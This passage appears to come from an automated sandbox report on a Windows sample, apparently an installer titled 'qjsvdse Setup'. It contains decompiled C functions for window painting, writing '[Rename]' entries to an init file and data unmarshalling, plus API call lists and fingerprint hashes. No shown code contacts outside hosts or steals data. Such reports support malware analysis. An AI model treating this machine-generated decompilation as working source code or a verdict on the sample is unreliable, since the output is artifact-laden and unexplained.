                                                                                              				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                              			}















                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextA.USER32(00000000,qjsvdse Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F$`Ae$qjsvdse Setup
                                                                                              • API String ID: 941294808-3970708335
                                                                                              • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                              • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                                                                              • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                              • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00405679() {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t15;
                                                                                              				long _t16;
                                                                                              				intOrPtr _t18;
                                                                                              				int _t20;
                                                                                              				void* _t28;
                                                                                              				long _t29;
                                                                                              				intOrPtr* _t37;
                                                                                              				int _t43;
                                                                                              				void* _t44;
                                                                                              				long _t47;
                                                                                              				CHAR* _t49;
                                                                                              				void* _t51;
                                                                                              				void* _t53;
                                                                                              				intOrPtr* _t54;
                                                                                              				void* _t55;
                                                                                              				void* _t56;
                                                                                              
                                                                                              				_t15 = E00405C49(1);
                                                                                              				_t49 =  *(_t55 + 0x18);
                                                                                              				if(_t15 != 0) {
                                                                                              					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                              					if(_t20 != 0) {
                                                                                              						L16:
                                                                                              						 *0x42ebf0 =  *0x42ebf0 + 1;
                                                                                              						return _t20;
                                                                                              					}
                                                                                              				}
                                                                                              				 *0x42c168 = 0x4c554e;
                                                                                              				if(_t49 == 0) {
                                                                                              					L5:
                                                                                              					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
                                                                                              					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                              						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
                                                                                              						_t18 =  *0x42eb70; // 0x654160
                                                                                              						_t56 = _t55 + 0x10;
                                                                                              						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
                                                                                              						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
                                                                                              						_t53 = _t20;
                                                                                              						 *(_t56 + 0x14) = _t53;
                                                                                              						if(_t53 == 0xffffffff) {
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						_t47 = GetFileSize(_t53, 0);
                                                                                              						_t7 = _t43 + 0xa; // 0xa
                                                                                              						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                              						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                              							L15:
                                                                                              							_t20 = CloseHandle(_t53);
                                                                                              							goto L16;
                                                                                              						} else {
                                                                                              							if(E00405577(_t51, "[Rename]\r\n") != 0) {
                                                                                              								_t28 = E00405577(_t26 + 0xa, 0x409328);
                                                                                              								if(_t28 == 0) {
                                                                                              									L13:
                                                                                              									_t29 = _t47;
                                                                                              									L14:
                                                                                              									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
                                                                                              									SetFilePointer(_t53, 0, 0, 0);
                                                                                              									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                              									GlobalFree(_t51);
                                                                                              									goto L15;
                                                                                              								}
                                                                                              								_t37 = _t28 + 1;
                                                                                              								_t44 = _t51 + _t47;
                                                                                              								_t54 = _t37;
                                                                                              								if(_t37 >= _t44) {
                                                                                              									L21:
                                                                                              									_t53 =  *(_t56 + 0x14);
                                                                                              									_t29 = _t37 - _t51;
                                                                                              									goto L14;
                                                                                              								} else {
                                                                                              									goto L20;
                                                                                              								}
                                                                                              								do {
                                                                                              									L20:
                                                                                              									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                              									_t54 = _t54 + 1;
                                                                                              								} while (_t54 < _t44);
                                                                                              								goto L21;
                                                                                              							}
                                                                                              							E0040592B(_t51 + _t47, "[Rename]\r\n");
                                                                                              							_t47 = _t47 + 0xa;
                                                                                              							goto L13;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					CloseHandle(E00405602(_t49, 0, 1));
                                                                                              					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
                                                                                              					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                              						goto L5;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t16;
                                                                                              			}























                                                                                              APIs
                                                                                                • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                                                                              • GetShortPathNameA.KERNEL32 ref: 004056CF
                                                                                              • GetShortPathNameA.KERNEL32 ref: 004056EC
                                                                                              • wsprintfA.USER32 ref: 0040570A
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                                                                              • GlobalFree.KERNEL32 ref: 004057C9
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                                                                                • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                                • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                              • String ID: %s=%s$[Rename]$`Ae
                                                                                              • API String ID: 3772915668-343329245
                                                                                              • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                              • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                                                                              • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                                                                              • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 24%
                                                                                              			E6F1D99A7() {
                                                                                              				void* _t219;
                                                                                              				void* _t221;
                                                                                              				void* _t222;
                                                                                              
                                                                                              				L0:
                                                                                              				while(1) {
                                                                                              					L0:
                                                                                              					E6F1E0730( *(_t219 + 0xc), 0, ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c);
                                                                                              					_t222 = _t221 + 0xc;
                                                                                              					 *(_t219 + 0xc) =  *(_t219 + 0xc) + ( *( *(_t219 + 0x10)) & 0x000000ff) - 0x3c;
                                                                                              					while(1) {
                                                                                              						L47:
                                                                                              						 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              						L1:
                                                                                              						while(( *( *(_t219 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                              							 *(_t219 - 0xc) =  *( *(_t219 + 0x10)) & 0x000000ff;
                                                                                              							 *(_t219 - 0xc) =  *(_t219 - 0xc) - 1;
                                                                                              							if( *(_t219 - 0xc) > 0xb8) {
                                                                                              								L46:
                                                                                              								0x6f1d0000("unhandled format %d\n",  *( *(_t219 + 0x10)) & 0x000000ff);
                                                                                              								_t222 = _t222 + 8;
                                                                                              								while(1) {
                                                                                              									L47:
                                                                                              									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              									goto L1;
                                                                                              								}
                                                                                              							}
                                                                                              							L3:
                                                                                              							_t15 =  *(_t219 - 0xc) + 0x6f1d9b24; // 0xcccccc0f
                                                                                              							switch( *((intOrPtr*)(( *_t15 & 0x000000ff) * 4 +  &M6F1D9AE0))) {
                                                                                              								case 0:
                                                                                              									L4:
                                                                                              									E6F1DAFA0( *((intOrPtr*)(_t219 + 8)),  *(_t219 + 0xc), 1);
                                                                                              									_push( *(_t219 + 0xc));
                                                                                              									_push( *( *(_t219 + 0xc)) & 0x0000ffff);
                                                                                              									_push("byte=%d => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									_t222 = _t222 + 0x18;
                                                                                              									 *(_t219 + 0xc) =  &(( *(_t219 + 0xc))[0]);
                                                                                              									L47:
                                                                                              									 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              									goto L1;
                                                                                              								case 1:
                                                                                              									L5:
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                              									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                              									_push("short=%d => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 2;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 2:
                                                                                              									L9:
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *( *(__ebp + 0xc));
                                                                                              									_push( *( *(__ebp + 0xc)));
                                                                                              									_push("long=%d => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 3:
                                                                                              									L12:
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									asm("cvtss2sd xmm0, [eax]");
                                                                                              									__esp = __esp - 8;
                                                                                              									asm("movsd [esp], xmm0");
                                                                                              									_push("float=%f => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0x10;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 4:
                                                                                              									L13:
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *(__edx + 4);
                                                                                              									_push(__eax);
                                                                                              									__ecx =  *__edx;
                                                                                              									_push(__ecx);
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 8;
                                                                                              									_push(__eax);
                                                                                              									_push("longlong=%s => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 5:
                                                                                              									L14:
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__eax = E6F1DAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__esp = __esp - 8;
                                                                                              									asm("movsd xmm0, [eax]");
                                                                                              									asm("movsd [esp], xmm0");
                                                                                              									_push("double=%f => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0x10;
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 8;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 6:
                                                                                              									L6:
                                                                                              									__edx = __ebp - 4;
                                                                                              									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                              									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__edx =  *( *(__ebp + 0xc));
                                                                                              									_push( *( *(__ebp + 0xc)));
                                                                                              									_push("enum16=%d => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                              										_push(0x6f5);
                                                                                              										__eax =  *0x6f1d0000();
                                                                                              									}
                                                                                              									L8:
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 7:
                                                                                              									L15:
                                                                                              									 *(__ebp - 0x1c) = 0;
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									_push("pointer => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 8;
                                                                                              									__eax =  *(__ebp + 0x10);
                                                                                              									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              										__edx =  *(__ebp + 0x10);
                                                                                              										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                              									}
                                                                                              									__eax =  *(__ebp + 0x14);
                                                                                              									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              									if(__ecx != 0x11) {
                                                                                              										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                              										__eax = E6F1D73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                              									}
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__eax + 4);
                                                                                              									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                              									__edx =  *(__ebp + 8);
                                                                                              									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                              										__ecx =  *(__ebp + 0x14);
                                                                                              										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              											 *(__ebp + 8) = E6F1DAF00( *(__ebp + 8), 4);
                                                                                              										}
                                                                                              									} else {
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__edx =  *(__ecx + 0x34);
                                                                                              										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                              										 *(__ebp - 0x1c) = 1;
                                                                                              									}
                                                                                              									__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                              									__edx =  *(__ebp + 0x14);
                                                                                              									__eax =  *(__ebp + 0xc);
                                                                                              									__ecx =  *( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp + 0xc);
                                                                                              									__eax =  *(__ebp - 0x20);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__eax = E6F1DB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                              									if( *(__ebp - 0x1c) == 0) {
                                                                                              										L29:
                                                                                              										__edx =  *(__ebp + 0x10);
                                                                                              										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              										} else {
                                                                                              											__ecx =  *(__ebp + 0x14);
                                                                                              											__ecx =  *(__ebp + 0x14) + 4;
                                                                                              											 *(__ebp + 0x14) = __ecx;
                                                                                              										}
                                                                                              										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              										while(1) {
                                                                                              											L47:
                                                                                              											 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              											goto L1;
                                                                                              										}
                                                                                              									} else {
                                                                                              										do {
                                                                                              											L24:
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											__eax =  *(__edx + 0x14);
                                                                                              											_push( *(__edx + 0x14));
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__edx =  *( *(__ebp + 8));
                                                                                              											__eax =  *(__ebp + 8);
                                                                                              											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                              											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                              											_push("buffer=%d/%d\n");
                                                                                              											0x6f1d0000();
                                                                                              											__esp = __esp + 0xc;
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											__eax =  *( *(__ebp + 8));
                                                                                              											__ecx =  *(__eax + 8);
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              											__eax =  *(__ebp + 8);
                                                                                              											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                              												__ecx =  *(__ebp + 8);
                                                                                              												__edx =  *( *(__ebp + 8));
                                                                                              												__eax =  *(__edx + 8);
                                                                                              												__ecx =  *(__ebp + 8);
                                                                                              												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              												__edx =  *(__ebp + 8);
                                                                                              												 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                              												_push( *(__edx + 4) - __eax);
                                                                                              												_push("buffer overflow %d bytes\n");
                                                                                              												0x6f1d0000();
                                                                                              												__esp = __esp + 8;
                                                                                              											}
                                                                                              											__edx = 0;
                                                                                              										} while (0 != 0);
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__edx =  *(__ecx + 4);
                                                                                              										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										__ecx =  *(__ebp - 0x20);
                                                                                              										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                              										__edx =  *(__ebp + 0x14);
                                                                                              										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__eax = E6F1DAF00( *(__ebp + 8), 4);
                                                                                              										}
                                                                                              										goto L29;
                                                                                              									}
                                                                                              								case 8:
                                                                                              									L33:
                                                                                              									__ecx =  *(__ebp - 0x10);
                                                                                              									__edx = __ebp + 0xc;
                                                                                              									__eax = E6F1D7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 9:
                                                                                              									L34:
                                                                                              									__eax =  *(__ebp - 0x10);
                                                                                              									__ecx = __ebp + 0xc;
                                                                                              									__eax = E6F1D7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xa:
                                                                                              									L35:
                                                                                              									__edx =  *(__ebp - 0x10);
                                                                                              									__ebp + 0xc = E6F1D7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xb:
                                                                                              									goto L0;
                                                                                              								case 0xc:
                                                                                              									L36:
                                                                                              									1 = 1 << 0;
                                                                                              									__eax =  *(__ebp + 0x10);
                                                                                              									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									__eax =  *(__ebp + 0x10);
                                                                                              									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                              									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                              									__edx =  *(__ebp - 8);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									 *(__ebp - 0x18) = E6F1DE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									_push( *(__ebp + 0xc));
                                                                                              									__edx =  *(__ebp - 0x18);
                                                                                              									_push( *(__ebp - 0x18));
                                                                                              									_push("embedded complex (size=%d) => %p\n");
                                                                                              									0x6f1d0000();
                                                                                              									__esp = __esp + 0xc;
                                                                                              									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                              									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                              										__ecx =  *(__ebp - 0x18);
                                                                                              										__edx =  *(__ebp + 0xc);
                                                                                              										__eax = E6F1E0730( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                              									}
                                                                                              									__eax =  *(__ebp - 8);
                                                                                              									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                              									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                              									__edx =  *(0x6f1eb3d8 + __ecx * 4);
                                                                                              									 *(__ebp - 0x14) =  *(0x6f1eb3d8 + __ecx * 4);
                                                                                              									if( *(__ebp - 0x14) == 0) {
                                                                                              										__edx =  *(__ebp - 8);
                                                                                              										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                              										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                              										_push("no unmarshaller for embedded type %02x\n");
                                                                                              										0x6f1d0000();
                                                                                              										__esp = __esp + 8;
                                                                                              									} else {
                                                                                              										__eax =  *(__ebp - 8);
                                                                                              										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                              										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                              											_push(0);
                                                                                              											__edx =  *(__ebp - 8);
                                                                                              											_push( *(__ebp - 8));
                                                                                              											__eax = __ebp + 0xc;
                                                                                              											_push(__ebp + 0xc);
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											_push( *(__ebp + 8));
                                                                                              											__eax =  *(__ebp - 0x14)();
                                                                                              										} else {
                                                                                              											_push(0);
                                                                                              											__edx =  *(__ebp - 8);
                                                                                              											_push( *(__ebp - 8));
                                                                                              											__eax =  *(__ebp + 0xc);
                                                                                              											_push( *(__ebp + 0xc));
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											_push( *(__ebp + 8));
                                                                                              											__eax =  *(__ebp - 0x14)();
                                                                                              										}
                                                                                              									}
                                                                                              									__ecx =  *(__ebp + 0xc);
                                                                                              									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                              									 *(__ebp + 0xc) = __ecx;
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                              									goto L1;
                                                                                              								case 0xd:
                                                                                              									L45:
                                                                                              									while(1) {
                                                                                              										L47:
                                                                                              										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
                                                                                              										goto L1;
                                                                                              									}
                                                                                              								case 0xe:
                                                                                              									L10:
                                                                                              									__edx = __ebp - 0x24;
                                                                                              									 *(__ebp + 8) = E6F1DAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                              									__ecx =  *(__ebp + 0xc);
